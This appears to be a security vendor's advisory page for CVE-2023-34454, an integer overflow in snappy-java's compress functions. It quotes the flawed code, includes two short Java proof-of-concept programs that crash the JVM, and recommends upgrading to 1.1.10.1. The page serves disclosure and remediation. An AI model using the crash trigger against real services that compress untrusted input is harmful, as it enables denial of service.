CVE-2023-34454

CVE-2023-34454 is a medium-severity integer overflow or wraparound vulnerability in org.xerial.snappy:snappy-java (maven), affecting versions <= 1.1.10.0. It is fixed in 1.1.10.1.

Does this CVE actually affect you?

Kodem shows which CVEs are reachable and running in your applications, so you fix what's exploitable, not just what's listed.

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

Runtime intelligence, not another scanner.

Summary

snappy-java's Integer Overflow vulnerability in compress leads to DoS

Due to unchecked multiplications, an integer overflow may occur, causing an unrecoverable fatal error.

Description

The function compress(char[] input) in the file Snappy.java receives an array of characters and compresses it. It does so by multiplying the length by 2 and passing it to the rawCompress function.

public static byte[] compress(char[] input)
            throws IOException
    {
        return rawCompress(input, input.length * 2); // char uses 2 bytes
    }

Since the length is not tested, the multiplication by two can cause an integer overflow and become negative. The rawCompress function then uses the received length and passes it to the natively compiled maxCompressedLength function, using the returned value to allocate a byte array.

    public static byte[] rawCompress(Object data, int byteSize)
            throws IOException
    {
        byte[] buf = new byte[Snappy.maxCompressedLength(byteSize)];
        int compressedByteSize = impl.rawCompress(data, 0, byteSize, buf, 0);
        byte[] result = new byte[compressedByteSize];
        System.arraycopy(buf, 0, result, 0, compressedByteSize);
        return result;
    }

Since the maxCompressedLength function treats the length as an unsigned integer, it doesn’t care that it is negative, and it returns a valid value, which is casted to a signed integer by the Java engine. If the result is negative, a “java.lang.NegativeArraySizeException” exception will be raised while trying to allocate the array “buf”. On the other side, if the result is positive, the “buf” array will successfully be allocated, but its size might be too small to use for the compression, causing a fatal Access Violation error.
The same issue exists also when using the “compress” functions that receive double, float, int, long and short, each using a different multiplier that may cause the same issue. The issue most likely won’t occur when using a byte array, since creating a byte array of size 0x80000000 (or any other negative value) is impossible in the first place.

Steps To Reproduce

Compile and run the following code:

package org.example;
import org.xerial.snappy.Snappy;

import java.io.*;

public class Main {

    public static void main(String[] args) throws IOException {
        char[] uncompressed = new char[0x40000000];
        byte[] compressed = Snappy.compress(uncompressed);
    }
}

The program will crash, creating crashdumps and showing the following error (or similar):

#
# A fatal error has been detected by the Java Runtime Environment:
#
#  EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x0000000063a01c20, pid=21164, tid=508
#
.......

Alternatively - compile and run the following code:

package org.example;
import org.xerial.snappy.Snappy;

import java.io.*;

public class Main {

    public static void main(String[] args) throws IOException {
        char[] uncompressed = new char[0x3fffffff];
        byte[] compressed = Snappy.compress(uncompressed);
    }
}

The program will crash with the following error (or similar), since the maxCompressedLength returns a value that is interpreted as negative by java:

Exception in thread "main" java.lang.NegativeArraySizeException: -1789569677
	at org.xerial.snappy.Snappy.rawCompress(Snappy.java:425)
	at org.xerial.snappy.Snappy.compress(Snappy.java:172)
	at org.example.Main.main(Main.java:10)

Impact

Denial of Service

An arithmetic operation produces a value that exceeds the integer type's maximum, causing it to wrap to an unexpected small value. Typical impact: incorrect size calculations leading to heap overflows or logic errors.

CVE-2023-34454 has a CVSS score of 5.9 (Medium). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (1.1.10.1); upgrading removes the vulnerable code path.

Affected versions

org.xerial.snappy:snappy-java (<= 1.1.10.0)

Security releases

org.xerial.snappy:snappy-java → 1.1.10.1 (maven)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

Already deployed Kodem?

See it in your environmentNew to Kodem? Get a demo →

Remediation advice

Upgrade org.xerial.snappy:snappy-java to 1.1.10.1 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2023-34454? CVE-2023-34454 is a medium-severity integer overflow or wraparound vulnerability in org.xerial.snappy:snappy-java (maven), affecting versions <= 1.1.10.0. It is fixed in 1.1.10.1. An arithmetic operation produces a value that exceeds the integer type's maximum, causing it to wrap to an unexpected small value.
  2. How severe is CVE-2023-34454? CVE-2023-34454 has a CVSS score of 5.9 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of org.xerial.snappy:snappy-java are affected by CVE-2023-34454? org.xerial.snappy:snappy-java (maven) versions <= 1.1.10.0 is affected.
  4. Is there a fix for CVE-2023-34454? Yes. CVE-2023-34454 is fixed in 1.1.10.1. Upgrade to this version or later.
  5. Is CVE-2023-34454 exploitable, and should I be worried? Whether CVE-2023-34454 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2023-34454 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2023-34454? Upgrade org.xerial.snappy:snappy-java to 1.1.10.1 or later.

Other vulnerabilities in org.xerial.snappy:snappy-java

Stop the waste.
Protect your environment with Kodem.